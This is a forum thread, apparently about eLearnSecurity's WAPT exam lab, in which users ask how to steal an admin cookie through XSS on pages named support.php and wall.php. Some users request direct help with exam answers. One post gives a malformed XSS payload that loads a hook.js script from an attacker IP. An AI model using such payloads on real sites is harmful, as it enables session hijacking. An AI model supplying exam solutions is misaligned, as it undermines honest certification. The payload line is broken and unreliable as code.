Jump to content
EH808

ELearnSecurity Exams

Recommended Posts

@pizzaahr3 
@igoj


hey guys how do i get the admin to visit the page, i can sucessfully exploit the xss on support.php and wall.php but the admin never comes, been at this for last two last days. i have everything else except the admin cookie

thanks

  • Like 1

Share this post


Link to post
Share on other sites

what xss payload I should use to get the admin cookies, tried to many but cant get anything ???

help please ?
 

 

Share this post


Link to post
Share on other sites

The material is directly in front of you. Do you guys expect people to spoon feed you the exams as well? At least put some effort into it.

 

Share this post


Link to post
Share on other sites

yes, you are right. 
I tried diff xss payload for getting admin cookies 
e.g.

<html><head/><body><script>src=http://IP/hook.js</script></body></html>

and many more, but all fail !!! 😞

Share this post


Link to post
Share on other sites
Posted (edited)

Hi,  May i check if anyone is able to help me for the WAPT?
i am currently stuck
i have made an XSS script to collect the cookie in the wall.php but i have not seen the admin cookie.
i am not sure where else to search.
 

nvm. my other code had a typo so i did not get the admin cookie
fixed it and it worked.

Edited by theunknownswat

Share this post


Link to post
Share on other sites
On 6/4/2020 at 7:37 AM, shoaibsheikh said:

to all the ppl stuck on stealing admin cookies, this can help you a lot:

Hidden Content

    Give reaction to this post to see the hidden content.

I have followed the above tutorial step by step, and cant get it to work on my Kali machine, any ideas as to why this would happen?

  • Like 8
  • Thanks 1
  • Confused 1

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


×
×
  • Create New...